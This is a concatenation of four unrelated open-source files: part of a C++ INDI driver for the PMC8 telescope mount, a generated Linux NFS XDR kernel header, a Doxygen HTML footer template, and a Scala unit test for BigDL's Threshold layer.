== IPS_BUSY) { GuideNSNP.s = GuideWENP.s = IPS_IDLE; GuideNSN[0].value = GuideNSN[1].value = 0.0; GuideWEN[0].value = GuideWEN[1].value = 0.0; if (GuideNSTID) { IERmTimer(GuideNSTID); GuideNSTID = 0; } if (GuideWETID) { IERmTimer(GuideWETID); GuideNSTID = 0; } LOG_INFO("Guide aborted."); IDSetNumber(&GuideNSNP, nullptr); IDSetNumber(&GuideWENP, nullptr); return true; } return abort_pmc8(PortFD); } bool PMC8::Park() { #if 0 // FIXME - Currently only support parking at motor position (0, 0) targetRA = GetAxis1Park(); targetDEC = GetAxis2Park(); if (set_pmc8_radec(PortFD, r, d) == false) { LOG_ERROR("Error setting RA/DEC."); return false; } #endif if (park_pmc8(PortFD)) { TrackState = SCOPE_PARKING; LOG_INFO("Telescope parking in progress to motor position (0, 0)"); return true; } else { return false; } } bool PMC8::UnPark() { if (unpark_pmc8(PortFD)) { SetParked(false); TrackState = SCOPE_IDLE; return true; } else { return false; } } bool PMC8::Handshake() { if (isSimulation()) { set_pmc8_sim_system_status(ST_STOPPED); set_pmc8_sim_track_rate(PMC8_TRACK_SIDEREAL); set_pmc8_sim_move_rate(PMC8_MOVE_64X); // set_pmc8_sim_hemisphere(HEMI_NORTH); } if (check_pmc8_connection(PortFD) == false) return false; return true; } bool PMC8::updateTime(ln_date *utc, double utc_offset) { // mark unused INDI_UNUSED(utc); INDI_UNUSED(utc_offset); LOG_ERROR("PMC8::updateTime() not implemented!"); return false; } bool PMC8::updateLocation(double latitude, double longitude, double elevation) { INDI_UNUSED(elevation); if (longitude > 180) longitude -= 360; // do not support Southern Hemisphere yet! if (latitude < 0) { LOG_ERROR("Southern Hemisphere not currently supported!"); return false; } // must also keep "low level" aware of position to convert motor counts to RA/DEC set_pmc8_location(latitude, longitude); char l[32] = {0}, L[32] = {0}; fs_sexa(l, latitude, 3, 3600); fs_sexa(L, longitude, 4, 3600); LOGF_INFO("Site location updated to Lat %.32s - Long %.32s", l, L); return true; } void PMC8::debugTriggered(bool enable) { set_pmc8_debug(enable); } void PMC8::simulationTriggered(bool enable) { set_pmc8_simulation(enable); } bool PMC8::MoveNS(INDI_DIR_NS dir, TelescopeMotionCommand command) { if (TrackState == SCOPE_PARKED) { LOG_ERROR("Please unpark the mount before issuing any motion commands."); return false; } // read desired move rate int currentIndex = IUFindOnSwitchIndex(&SlewRateSP); LOGF_DEBUG("MoveNS at slew index %d", currentIndex); switch (command) { case MOTION_START: if (start_pmc8_motion(PortFD, (dir == DIRECTION_NORTH ? PMC8_N : PMC8_S), currentIndex) == false) { LOG_ERROR("Error setting N/S motion direction."); return false; } else { LOGF_INFO("Moving toward %s.", (dir == DIRECTION_NORTH) ? "North" : "South"); } break; case MOTION_STOP: if (stop_pmc8_motion(PortFD, (dir == DIRECTION_NORTH ? PMC8_N : PMC8_S)) == false) { LOG_ERROR("Error stopping N/S motion."); return false; } else { LOGF_INFO("%s motion stopped.", (dir == DIRECTION_NORTH) ? "North" : "South"); } break; } return true; } bool PMC8::MoveWE(INDI_DIR_WE dir, TelescopeMotionCommand command) { if (TrackState == SCOPE_PARKED) { LOG_ERROR("Please unpark the mount before issuing any motion commands."); return false; } // read desired move rate int currentIndex = IUFindOnSwitchIndex(&SlewRateSP); LOGF_DEBUG("MoveWE at slew index %d", currentIndex); switch (command) { case MOTION_START: if (start_pmc8_motion(PortFD, (dir == DIRECTION_WEST ? PMC8_W : PMC8_E), currentIndex) == false) { LOG_ERROR("Error setting N/S motion direction."); return false; } else { LOGF_INFO("Moving toward %s.", (dir == DIRECTION_WEST) ? "West" : "East"); } break; case MOTION_STOP: if (stop_pmc8_motion(PortFD, (dir == DIRECTION_WEST ? PMC8_W : PMC8_E)) == false) { LOG_ERROR("Error stopping W/E motion."); return false; } else { LOGF_INFO("%s motion stopped.", (dir == DIRECTION_WEST) ? "West" : "East"); // restore tracking if (TrackState == SCOPE_TRACKING) { LOG_INFO("Move E/W complete, tracking..."); if (!SetTrackEnabled(true)) { LOG_ERROR("slew complete - unable to enable tracking"); return false; } if (!SetTrackMode(IUFindOnSwitchIndex(&TrackModeSP))) { LOG_ERROR("slew complete - unable to set track mode"); return false; } } } break; } return true; } IPState PMC8::GuideNorth(uint32_t ms) { long timetaken_us; int timeremain_ms; // If already moving, then stop movement if (MovementNSSP.s == IPS_BUSY) { int dir = IUFindOnSwitchIndex(&MovementNSSP); MoveNS(dir == 0 ? DIRECTION_NORTH : DIRECTION_SOUTH, MOTION_STOP); } if (GuideNSTID) { IERmTimer(GuideNSTID); GuideNSTID = 0; } start_pmc8_guide(PortFD, PMC8_N, (int)ms, timetaken_us); timeremain_ms = (int)(ms - ((float)timetaken_us) / 1000.0); if (timeremain_ms < 0) timeremain_ms = 0; GuideNSTID = IEAddTimer(timeremain_ms, guideTimeoutHelperN, this); return IPS_BUSY; } IPState PMC8::GuideSouth(uint32_t ms) { long timetaken_us; int timeremain_ms; // If already moving, then stop movement if (MovementNSSP.s == IPS_BUSY) { int dir = IUFindOnSwitchIndex(&MovementNSSP); MoveNS(dir == 0 ? DIRECTION_NORTH : DIRECTION_SOUTH, MOTION_STOP); } if (GuideNSTID) { IERmTimer(GuideNSTID); GuideNSTID = 0; } start_pmc8_guide(PortFD, PMC8_S, (int)ms, timetaken_us); timeremain_ms = (int)(ms - ((float)timetaken_us) / 1000.0); if (timeremain_ms < 0) timeremain_ms = 0; GuideNSTID = IEAddTimer(timeremain_ms, guideTimeoutHelperS, this); return IPS_BUSY; } IPState PMC8::GuideEast(uint32_t ms) { long timetaken_us; int timeremain_ms; // If already moving (no pulse command), then stop movement if (MovementWESP.s == IPS_BUSY) { int dir = IUFindOnSwitchIndex(&MovementWESP); MoveWE(dir == 0 ? DIRECTION_WEST : DIRECTION_EAST, MOTION_STOP); } if (GuideWETID) { IERmTimer(GuideWETID); GuideWETID = 0; } start_pmc8_guide(PortFD, PMC8_E, (int)ms, timetaken_us); timeremain_ms = (int)(ms - ((float)timetaken_us) / 1000.0); if (timeremain_ms < 0) timeremain_ms = 0; GuideWETID = IEAddTimer(timeremain_ms, guideTimeoutHelperE, this); return IPS_BUSY; } IPState PMC8::GuideWest(uint32_t ms) { long timetaken_us; int timeremain_ms; // If already moving (no pulse command), then stop movement if (MovementWESP.s == IPS_BUSY) { int dir = IUFindOnSwitchIndex(&MovementWESP); MoveWE(dir == 0 ? DIRECTION_WEST : DIRECTION_EAST, MOTION_STOP); } if (GuideWETID) { IERmTimer(GuideWETID); GuideWETID = 0; } start_pmc8_guide(PortFD, PMC8_W, (int)ms, timetaken_us); timeremain_ms = (int)(ms - ((float)timetaken_us) / 1000.0); if (timeremain_ms < 0) timeremain_ms = 0; GuideWETID = IEAddTimer(timeremain_ms, guideTimeoutHelperW, this); return IPS_BUSY; } void PMC8::guideTimeout(PMC8_DIRECTION calldir) { // end previous pulse command stop_pmc8_guide(PortFD, calldir); if (calldir == PMC8_N || calldir == PMC8_S) { GuideNSNP.np[0].value = 0; GuideNSNP.np[1].value = 0; GuideNSNP.s = IPS_IDLE; GuideNSTID = 0; IDSetNumber(&GuideNSNP, nullptr); } if (calldir == PMC8_W || calldir == PMC8_E) { GuideWENP.np[0].value = 0; GuideWENP.np[1].value = 0; GuideWENP.s = IPS_IDLE; GuideWETID = 0; IDSetNumber(&GuideWENP, nullptr); } LOG_DEBUG("GUIDE CMD COMPLETED"); } //GUIDE The timer helper functions. void PMC8::guideTimeoutHelperN(void *p) { static_cast<PMC8*>(p)->guideTimeout(PMC8_N); } void PMC8::guideTimeoutHelperS(void *p) { static_cast<PMC8*>(p)->guideTimeout(PMC8_S); } void PMC8::guideTimeoutHelperW(void *p) { static_cast<PMC8*>(p)->guideTimeout(PMC8_W); } void PMC8::guideTimeoutHelperE(void *p) { static_cast<PMC8*>(p)->guideTimeout(PMC8_E); } bool PMC8::SetSlewRate(int index) { INDI_UNUSED(index); // slew rate is rate for MoveEW/MOVENE commands - not for GOTOs!!! // just return true - we will check SlewRateSP when we do actually moves return true; } bool PMC8::saveConfigItems(FILE *fp) { INDI::Telescope::saveConfigItems(fp); IUSaveConfigSwitch(fp, &MountTypeSP); return true; } void PMC8::mountSim() { static struct timeval ltv; struct timeval tv; double dt, da, dx; int nlocked; /* update elapsed time since last poll, don't presume exactly POLLMS */ gettimeofday(&tv, nullptr); if (ltv.tv_sec == 0 && ltv.tv_usec == 0) ltv = tv; dt = tv.tv_sec - ltv.tv_sec + (tv.tv_usec - ltv.tv_usec) / 1e6; ltv = tv; da = SLEWRATE * dt; /* Process per current state. We check the state of EQUATORIAL_COORDS and act acoordingly */ switch (TrackState) { case SCOPE_IDLE: currentRA += (TrackRateN[AXIS_RA].value / 3600.0 * dt) / 15.0; currentRA = range24(currentRA); break; case SCOPE_TRACKING: if (TrackModeS[1].s == ISS_ON) { currentRA += ( ((TRACKRATE_SIDEREAL / 3600.0) - (TrackRateN[AXIS_RA].value / 3600.0)) * dt) / 15.0; currentDEC += ( (TrackRateN[AXIS_DE].value / 3600.0) * dt); } break; case SCOPE_SLEWING: case SCOPE_PARKING: /* slewing - nail it when both within one pulse @ SLEWRATE */ nlocked = 0; dx = targetRA - currentRA; // Take shortest path if (fabs(dx) > 12) dx *= -1; if (fabs(dx) <= da) { currentRA = targetRA; nlocked++; } else if (dx > 0) currentRA += da / 15.; else currentRA -= da / 15.; if (currentRA < 0) currentRA += 24; else if (currentRA > 24) currentRA -= 24; dx = targetDEC - currentDEC; if (fabs(dx) <= da) { currentDEC = targetDEC; nlocked++; } else if (dx > 0) currentDEC += da; else currentDEC -= da; if (nlocked == 2) { if (TrackState == SCOPE_SLEWING) set_pmc8_sim_system_status(ST_TRACKING); else set_pmc8_sim_system_status(ST_PARKED); } break; case SCOPE_PARKED: // setting system status to parked will automatically // set the simulated RA/DEC to park position so reread set_pmc8_sim_system_status(ST_PARKED); get_pmc8_coords(PortFD, currentRA, currentDEC); break; default: break; } set_pmc8_sim_ra(currentRA); set_pmc8_sim_dec(currentDEC); } #if 0 // PMC8 only parks to motor position (0, 0) currently bool PMC8::SetCurrentPark() { SetAxis1Park(currentRA); SetAxis2Park(currentDEC); return true; } bool PMC8::SetDefaultPark() { // By default set RA to HA SetAxis1Park(ln_get_apparent_sidereal_time(ln_get_julian_from_sys())); // Set DEC to 90 or -90 depending on the hemisphere // SetAxis2Park((HemisphereS[HEMI_NORTH].s == ISS_ON) ? 90 : -90); SetAxis2Park(90); return true; } #else bool PMC8::SetCurrentPark() { LOG_ERROR("PPMC8::SetCurrentPark() not implemented!"); return false; } bool PMC8::SetDefaultPark() { LOG_ERROR("PMC8::SetDefaultPark() not implemented!"); return false; } #endif bool PMC8::SetTrackMode(uint8_t mode) { uint32_t pmc8_mode; LOGF_DEBUG("PMC8::SetTrackMode called mode=%d", mode); // FIXME - Need to make sure track modes are handled properly! //PMC8_TRACK_RATE rate = static_cast<PMC8_TRACK_RATE>(mode); switch (mode) { case TRACK_SIDEREAL: pmc8_mode = PMC8_TRACK_SIDEREAL; break; case TRACK_LUNAR: pmc8_mode = PMC8_TRACK_LUNAR; break; case TRACK_SOLAR: pmc8_mode = PMC8_TRACK_SOLAR; break; case TRACK_CUSTOM: pmc8_mode = PMC8_TRACK_CUSTOM; break; default: LOGF_ERROR("PMC8::SetTrackMode mode=%d not supported!", mode); return false; } if (pmc8_mode == PMC8_TRACK_CUSTOM) { if (set_pmc8_custom_ra_track_rate(PortFD, TrackRateN[AXIS_RA].value)) return true; } else { if (set_pmc8_track_mode(PortFD, mode)) return true; } return false; } bool PMC8::SetTrackRate(double raRate, double deRate) { static bool deRateWarning = true; double pmc8RARate; LOGF_DEBUG("PMC8::SetTrackRate called raRate=%f deRate=%f", raRate, deRate); // Convert to arcsecs/s to +/- 0.0100 accepted by //double pmc8RARate = raRate - TRACKRATE_SIDEREAL; // for now just send rate pmc8RARate = raRate; if (deRate != 0 && deRateWarning) { // Only send warning once per session deRateWarning = false; LOG_WARN("Custom Declination tracking rate is not implemented yet."); } if (set_pmc8_custom_ra_track_rate(PortFD, pmc8RARate)) return true; LOG_ERROR("PMC8::SetTrackRate not implemented!"); return false; } bool PMC8::SetTrackEnabled(bool enabled) { LOGF_DEBUG("PMC8::SetTrackEnabled called enabled=%d", enabled); // need to determine current tracking mode and start tracking if (enabled) { if (!SetTrackMode(IUFindOnSwitchIndex(&TrackModeSP))) { LOG_ERROR("PMC8::SetTrackREnabled - unable to enable tracking"); return false; } } else { bool rc; rc = set_pmc8_custom_ra_track_rate(PortFD, 0); if (!rc) { LOG_ERROR("PMC8::SetTrackREnabled - unable to set RA track rate to 0"); return false; } // currently only support tracking rate in RA // rc=set_pmc8_custom_dec_track_rate(PortFD, 0); // if (!rc) // { // LOG_ERROR("PMC8::SetTrackREnabled - unable to set DEC track rate to 0"); // return false; // } } return true; }
{ "pile_set_name": "Github" }
/**************************************************************************** **************************************************************************** *** *** This header was automatically generated from a Linux kernel header *** of the same name, to make information necessary for userspace to *** call into the kernel available to libc. It contains only constants, *** structures, and macros generated from the original header, and thus, *** contains no copyrightable information. *** **************************************************************************** ****************************************************************************/ #ifndef _LINUX_NFS_XDR_H #define _LINUX_NFS_XDR_H #include <linux/sunrpc/xprt.h> #include <linux/nfsacl.h> #define NFS_MAX_FILE_IO_SIZE (1048576U) #define NFS_DEF_FILE_IO_SIZE (4096U) #define NFS_MIN_FILE_IO_SIZE (1024U) struct nfs_fsid { uint64_t major; uint64_t minor; }; #define NFS_ATTR_WCC 0x0001 #define NFS_ATTR_FATTR 0x0002 #define NFS_ATTR_FATTR_V3 0x0004 #define NFS_ATTR_FATTR_V4 0x0008 #define NFS_ATTR_FATTR_V4_REFERRAL 0x0010 struct nfs_fsinfo { struct nfs_fattr *fattr; __u32 rtmax; __u32 rtpref; __u32 rtmult; __u32 wtmax; __u32 wtpref; __u32 wtmult; __u32 dtpref; __u64 maxfilesize; __u32 lease_time; }; struct nfs_fsstat { struct nfs_fattr *fattr; __u64 tbytes; __u64 fbytes; __u64 abytes; __u64 tfiles; __u64 ffiles; __u64 afiles; }; struct nfs2_fsstat { __u32 tsize; __u32 bsize; __u32 blocks; __u32 bfree; __u32 bavail; }; struct nfs_pathconf { struct nfs_fattr *fattr; __u32 max_link; __u32 max_namelen; }; struct nfs4_change_info { u32 atomic; u64 before; u64 after; }; struct nfs_seqid; struct nfs_openargs { const struct nfs_fh * fh; struct nfs_seqid * seqid; int open_flags; __u64 clientid; __u32 id; union { struct iattr * attrs; nfs4_verifier verifier; nfs4_stateid delegation; int delegation_type; } u; const struct qstr * name; const struct nfs_server *server; const u32 * bitmask; __u32 claim; }; struct nfs_openres { nfs4_stateid stateid; struct nfs_fh fh; struct nfs4_change_info cinfo; __u32 rflags; struct nfs_fattr * f_attr; struct nfs_fattr * dir_attr; const struct nfs_server *server; int delegation_type; nfs4_stateid delegation; __u32 do_recall; __u64 maxsize; }; struct nfs_open_confirmargs { const struct nfs_fh * fh; nfs4_stateid * stateid; struct nfs_seqid * seqid; }; struct nfs_open_confirmres { nfs4_stateid stateid; }; struct nfs_closeargs { struct nfs_fh * fh; nfs4_stateid * stateid; struct nfs_seqid * seqid; int open_flags; const u32 * bitmask; }; struct nfs_closeres { nfs4_stateid stateid; struct nfs_fattr * fattr; const struct nfs_server *server; }; struct nfs_lowner { __u64 clientid; u32 id; }; struct nfs_lock_args { struct nfs_fh * fh; struct file_lock * fl; struct nfs_seqid * lock_seqid; nfs4_stateid * lock_stateid; struct nfs_seqid * open_seqid; nfs4_stateid * open_stateid; struct nfs_lowner lock_owner; unsigned char block : 1; unsigned char reclaim : 1; unsigned char new_lock_owner : 1; }; struct nfs_lock_res { nfs4_stateid stateid; }; struct nfs_locku_args { struct nfs_fh * fh; struct file_lock * fl; struct nfs_seqid * seqid; nfs4_stateid * stateid; }; struct nfs_locku_res { nfs4_stateid stateid; }; struct nfs_lockt_args { struct nfs_fh * fh; struct file_lock * fl; struct nfs_lowner lock_owner; }; struct nfs_lockt_res { struct file_lock * denied; }; struct nfs4_delegreturnargs { const struct nfs_fh *fhandle; const nfs4_stateid *stateid; const u32 * bitmask; }; struct nfs4_delegreturnres { struct nfs_fattr * fattr; const struct nfs_server *server; }; struct nfs_readargs { struct nfs_fh * fh; struct nfs_open_context *context; __u64 offset; __u32 count; unsigned int pgbase; struct page ** pages; }; struct nfs_readres { struct nfs_fattr * fattr; __u32 count; int eof; }; struct nfs_writeargs { struct nfs_fh * fh; struct nfs_open_context *context; __u64 offset; __u32 count; enum nfs3_stable_how stable; unsigned int pgbase; struct page ** pages; const u32 * bitmask; }; struct nfs_writeverf { enum nfs3_stable_how committed; __u32 verifier[2]; }; struct nfs_writeres { struct nfs_fattr * fattr; struct nfs_writeverf * verf; __u32 count; const struct nfs_server *server; }; struct nfs_entry { __u64 ino; __u64 cookie, prev_cookie; const char * name; unsigned int len; int eof; struct nfs_fh * fh; struct nfs_fattr * fattr; }; struct nfs_sattrargs { struct nfs_fh * fh; struct iattr * sattr; }; struct nfs_diropargs { struct nfs_fh * fh; const char * name; unsigned int len; }; struct nfs_createargs { struct nfs_fh * fh; const char * name; unsigned int len; struct iattr * sattr; }; struct nfs_renameargs { struct nfs_fh * fromfh; const char * fromname; unsigned int fromlen; struct nfs_fh * tofh; const char * toname; unsigned int tolen; }; struct nfs_setattrargs { struct nfs_fh * fh; nfs4_stateid stateid; struct iattr * iap; const struct nfs_server * server; const u32 * bitmask; }; struct nfs_setaclargs { struct nfs_fh * fh; size_t acl_len; unsigned int acl_pgbase; struct page ** acl_pages; }; struct nfs_getaclargs { struct nfs_fh * fh; size_t acl_len; unsigned int acl_pgbase; struct page ** acl_pages; }; struct nfs_setattrres { struct nfs_fattr * fattr; const struct nfs_server * server; }; struct nfs_linkargs { struct nfs_fh * fromfh; struct nfs_fh * tofh; const char * toname; unsigned int tolen; }; struct nfs_symlinkargs { struct nfs_fh * fromfh; const char * fromname; unsigned int fromlen; const char * topath; unsigned int tolen; struct iattr * sattr; }; struct nfs_readdirargs { struct nfs_fh * fh; __u32 cookie; unsigned int count; struct page ** pages; }; struct nfs3_getaclargs { struct nfs_fh * fh; int mask; struct page ** pages; }; struct nfs3_setaclargs { struct inode * inode; int mask; struct posix_acl * acl_access; struct posix_acl * acl_default; struct page ** pages; }; struct nfs_diropok { struct nfs_fh * fh; struct nfs_fattr * fattr; }; struct nfs_readlinkargs { struct nfs_fh * fh; unsigned int pgbase; unsigned int pglen; struct page ** pages; }; struct nfs3_sattrargs { struct nfs_fh * fh; struct iattr * sattr; unsigned int guard; struct timespec guardtime; }; struct nfs3_diropargs { struct nfs_fh * fh; const char * name; unsigned int len; }; struct nfs3_accessargs { struct nfs_fh * fh; __u32 access; }; struct nfs3_createargs { struct nfs_fh * fh; const char * name; unsigned int len; struct iattr * sattr; enum nfs3_createmode createmode; __u32 verifier[2]; }; struct nfs3_mkdirargs { struct nfs_fh * fh; const char * name; unsigned int len; struct iattr * sattr; }; struct nfs3_symlinkargs { struct nfs_fh * fromfh; const char * fromname; unsigned int fromlen; const char * topath; unsigned int tolen; struct iattr * sattr; }; struct nfs3_mknodargs { struct nfs_fh * fh; const char * name; unsigned int len; enum nfs3_ftype type; struct iattr * sattr; dev_t rdev; }; struct nfs3_renameargs { struct nfs_fh * fromfh; const char * fromname; unsigned int fromlen; struct nfs_fh * tofh; const char * toname; unsigned int tolen; }; struct nfs3_linkargs { struct nfs_fh * fromfh; struct nfs_fh * tofh; const char * toname; unsigned int tolen; }; struct nfs3_readdirargs { struct nfs_fh * fh; __u64 cookie; __u32 verf[2]; int plus; unsigned int count; struct page ** pages; }; struct nfs3_diropres { struct nfs_fattr * dir_attr; struct nfs_fh * fh; struct nfs_fattr * fattr; }; struct nfs3_accessres { struct nfs_fattr * fattr; __u32 access; }; struct nfs3_readlinkargs { struct nfs_fh * fh; unsigned int pgbase; unsigned int pglen; struct page ** pages; }; struct nfs3_renameres { struct nfs_fattr * fromattr; struct nfs_fattr * toattr; }; struct nfs3_linkres { struct nfs_fattr * dir_attr; struct nfs_fattr * fattr; }; struct nfs3_readdirres { struct nfs_fattr * dir_attr; __u32 * verf; int plus; }; struct nfs3_getaclres { struct nfs_fattr * fattr; int mask; unsigned int acl_access_count; unsigned int acl_default_count; struct posix_acl * acl_access; struct posix_acl * acl_default; }; struct nfs_page; #define NFS_PAGEVEC_SIZE (8U) struct nfs_read_data { int flags; struct rpc_task task; struct inode *inode; struct rpc_cred *cred; struct nfs_fattr fattr; struct list_head pages; struct nfs_page *req; struct page **pagevec; unsigned int npages; struct nfs_readargs args; struct nfs_readres res; struct page *page_array[NFS_PAGEVEC_SIZE]; }; struct nfs_write_data { int flags; struct rpc_task task; struct inode *inode; struct rpc_cred *cred; struct nfs_fattr fattr; struct nfs_writeverf verf; struct list_head pages; struct nfs_page *req; struct page **pagevec; unsigned int npages; struct nfs_writeargs args; struct nfs_writeres res; struct page *page_array[NFS_PAGEVEC_SIZE]; }; struct nfs_access_entry; struct nfs_rpc_ops { int version; struct dentry_operations *dentry_ops; struct inode_operations *dir_inode_ops; struct inode_operations *file_inode_ops; int (*getroot) (struct nfs_server *, struct nfs_fh *, struct nfs_fsinfo *); int (*getattr) (struct nfs_server *, struct nfs_fh *, struct nfs_fattr *); int (*setattr) (struct dentry *, struct nfs_fattr *, struct iattr *); int (*lookup) (struct inode *, struct qstr *, struct nfs_fh *, struct nfs_fattr *); int (*access) (struct inode *, struct nfs_access_entry *); int (*readlink)(struct inode *, struct page *, unsigned int, unsigned int); int (*read) (struct nfs_read_data *); int (*write) (struct nfs_write_data *); int (*commit) (struct nfs_write_data *); int (*create) (struct inode *, struct dentry *, struct iattr *, int, struct nameidata *); int (*remove) (struct inode *, struct qstr *); int (*unlink_setup) (struct rpc_message *, struct dentry *, struct qstr *); int (*unlink_done) (struct dentry *, struct rpc_task *); int (*rename) (struct inode *, struct qstr *, struct inode *, struct qstr *); int (*link) (struct inode *, struct inode *, struct qstr *); int (*symlink) (struct inode *, struct qstr *, struct qstr *, struct iattr *, struct nfs_fh *, struct nfs_fattr *); int (*mkdir) (struct inode *, struct dentry *, struct iattr *); int (*rmdir) (struct inode *, struct qstr *); int (*readdir) (struct dentry *, struct rpc_cred *, u64, struct page *, unsigned int, int); int (*mknod) (struct inode *, struct dentry *, struct iattr *, dev_t); int (*statfs) (struct nfs_server *, struct nfs_fh *, struct nfs_fsstat *); int (*fsinfo) (struct nfs_server *, struct nfs_fh *, struct nfs_fsinfo *); int (*pathconf) (struct nfs_server *, struct nfs_fh *, struct nfs_pathconf *); u32 * (*decode_dirent)(u32 *, struct nfs_entry *, int plus); void (*read_setup) (struct nfs_read_data *); int (*read_done) (struct rpc_task *, struct nfs_read_data *); void (*write_setup) (struct nfs_write_data *, int how); int (*write_done) (struct rpc_task *, struct nfs_write_data *); void (*commit_setup) (struct nfs_write_data *, int how); int (*commit_done) (struct rpc_task *, struct nfs_write_data *); int (*file_open) (struct inode *, struct file *); int (*file_release) (struct inode *, struct file *); int (*lock)(struct file *, int, struct file_lock *); void (*clear_acl_cache)(struct inode *); }; #define NFS_CALL(op, inode, args) NFS_PROTO(inode)->op args #endif
{ "pile_set_name": "Github" }
<!-- HTML footer for doxygen 1.8.15--> <!-- start footer part --> <!--BEGIN GENERATE_TREEVIEW--> <div id="nav-path" class="navpath"><!-- id is needed for treeview function! --> <ul> $navpath <li class="footer">$generatedby <a href="http://www.doxygen.org/index.html"> <img class="footer" src="$relpath^doxygen.png" alt="doxygen"/></a> $doxygenversion </li> </ul> </div> <!--END GENERATE_TREEVIEW--> <!--BEGIN !GENERATE_TREEVIEW--> <hr class="footer"/><address class="footer"><small> $generatedby &#160;<a href="http://www.doxygen.org/index.html"> <img class="footer" src="$relpath^doxygen.png" alt="doxygen"/> </a> $doxygenversion </small></address> <!--END !GENERATE_TREEVIEW--> </body> </html>
{ "pile_set_name": "Github" }
/* * Copyright 2016 The BigDL Authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.intel.analytics.bigdl.nn import org.scalatest.FlatSpec import com.intel.analytics.bigdl.tensor.Tensor import com.intel.analytics.bigdl.utils.serializer.ModuleSerializationTest import scala.math.abs import scala.util.Random @com.intel.analytics.bigdl.tags.Parallel class ThresholdSpec extends FlatSpec { "A Threshold Module " should "generate correct output and grad" in { val module = new Threshold[Double](1, 0.8) val input = Tensor[Double](2, 2, 2) input(Array(1, 1, 1)) = -0.89699813351035 input(Array(1, 1, 2)) = 1.8529373928905 input(Array(1, 2, 1)) = 1.8799053365365 input(Array(1, 2, 2)) = 0.076761466450989 input(Array(2, 1, 1)) = 1.8863626234233 input(Array(2, 1, 2)) = 0.73405137099326 input(Array(2, 2, 1)) = 1.3404842875898 input(Array(2, 2, 2)) = -0.64910735283047 val gradOutput = Tensor[Double](2, 2, 2) gradOutput(Array(1, 1, 1)) = 0.31924905977212 gradOutput(Array(1, 1, 2)) = 0.22160539613105 gradOutput(Array(1, 2, 1)) = 0.19705923949368 gradOutput(Array(1, 2, 2)) = 0.386440459406 gradOutput(Array(2, 1, 1)) = 0.12920403806493 gradOutput(Array(2, 1, 2)) = 0.7669838971924 gradOutput(Array(2, 2, 1)) = 0.10939974407665 gradOutput(Array(2, 2, 2)) = 0.70845287665725 val expectedOutput = Tensor[Double](2, 2, 2) expectedOutput(Array(1, 1, 1)) = 0.8 expectedOutput(Array(1, 1, 2)) = 1.8529373928905 expectedOutput(Array(1, 2, 1)) = 1.8799053365365 expectedOutput(Array(1, 2, 2)) = 0.8 expectedOutput(Array(2, 1, 1)) = 1.8863626234233 expectedOutput(Array(2, 1, 2)) = 0.8 expectedOutput(Array(2, 2, 1)) = 1.3404842875898 expectedOutput(Array(2, 2, 2)) = 0.8 val expectedGrad = Tensor[Double](2, 2, 2) expectedGrad(Array(1, 1, 1)) = 0 expectedGrad(Array(1, 1, 2)) = 0.22160539613105 expectedGrad(Array(1, 2, 1)) = 0.19705923949368 expectedGrad(Array(1, 2, 2)) = 0 expectedGrad(Array(2, 1, 1)) = 0.12920403806493 expectedGrad(Array(2, 1, 2)) = 0 expectedGrad(Array(2, 2, 1)) = 0.10939974407665 expectedGrad(Array(2, 2, 2)) = 0 val inputOrg = input.clone() val gradOutputOrg = gradOutput.clone() val output = module.forward(input) val gradInput = module.backward(input, gradOutput) expectedOutput.map(output, (v1, v2) => { assert(abs(v1 - v2) < 1e-6); v1 }) expectedGrad.map(gradInput, (v1, v2) => { assert(abs(v1 - v2) < 1e-6); v1 }) assert(input == inputOrg) assert(gradOutput == gradOutputOrg) } "A Threshold Module with inPlace = true" should "generate correct output and grad" in { val module = new Threshold[Double](1, 0.8, true) val input = Tensor[Double](2, 2, 2) input(Array(1, 1, 1)) = -0.89699813351035 input(Array(1, 1, 2)) = 1.8529373928905 input(Array(1, 2, 1)) = 1.8799053365365 input(Array(1, 2, 2)) = 0.076761466450989 input(Array(2, 1, 1)) = 1.8863626234233 input(Array(2, 1, 2)) = 0.73405137099326 input(Array(2, 2, 1)) = 1.3404842875898 input(Array(2, 2, 2)) = -0.64910735283047 val gradOutput = Tensor[Double](2, 2, 2) gradOutput(Array(1, 1, 1)) = 0.31924905977212 gradOutput(Array(1, 1, 2)) = 0.22160539613105 gradOutput(Array(1, 2, 1)) = 0.19705923949368 gradOutput(Array(1, 2, 2)) = 0.386440459406 gradOutput(Array(2, 1, 1)) = 0.12920403806493 gradOutput(Array(2, 1, 2)) = 0.7669838971924 gradOutput(Array(2, 2, 1)) = 0.10939974407665 gradOutput(Array(2, 2, 2)) = 0.70845287665725 val expectedOutput = Tensor[Double](2, 2, 2) expectedOutput(Array(1, 1, 1)) = 0.8 expectedOutput(Array(1, 1, 2)) = 1.8529373928905 expectedOutput(Array(1, 2, 1)) = 1.8799053365365 expectedOutput(Array(1, 2, 2)) = 0.8 expectedOutput(Array(2, 1, 1)) = 1.8863626234233 expectedOutput(Array(2, 1, 2)) = 0.8 expectedOutput(Array(2, 2, 1)) = 1.3404842875898 expectedOutput(Array(2, 2, 2)) = 0.8 val expectedGrad = Tensor[Double](2, 2, 2) expectedGrad(Array(1, 1, 1)) = 0 expectedGrad(Array(1, 1, 2)) = 0.22160539613105 expectedGrad(Array(1, 2, 1)) = 0.19705923949368 expectedGrad(Array(1, 2, 2)) = 0 expectedGrad(Array(2, 1, 1)) = 0.12920403806493 expectedGrad(Array(2, 1, 2)) = 0 expectedGrad(Array(2, 2, 1)) = 0.10939974407665 expectedGrad(Array(2, 2, 2)) = 0 val inputOrg = input.clone() val gradOutputOrg = gradOutput.clone() val output = module.forward(input) val gradInput = module.backward(input, gradOutput) expectedOutput.map(output, (v1, v2) => { assert(abs(v1 - v2) < 1e-6); v1 }) expectedGrad.map(gradInput, (v1, v2) => { assert(abs(v1 - v2) < 1e-6); v1 }) // InPlace test assert(output == input) assert(gradInput == gradOutput) } "A Threshold Module with inPlace = true clearstate" should "not clear input" in { val module = new Threshold[Double](1, 0.8, true) val input = Tensor[Double](2, 2, 2) module.forward(input) module.clearState() assert(input.nElement() == 8) } } class ThresholdSerialTest extends ModuleSerializationTest { override def test(): Unit = { val threshold = Threshold[Float](0.5).setName("threshold") val input = Tensor[Float](5, 5).apply1(_ => Random.nextFloat()) runSerializationTest(threshold, input) } }
{ "pile_set_name": "Github" }
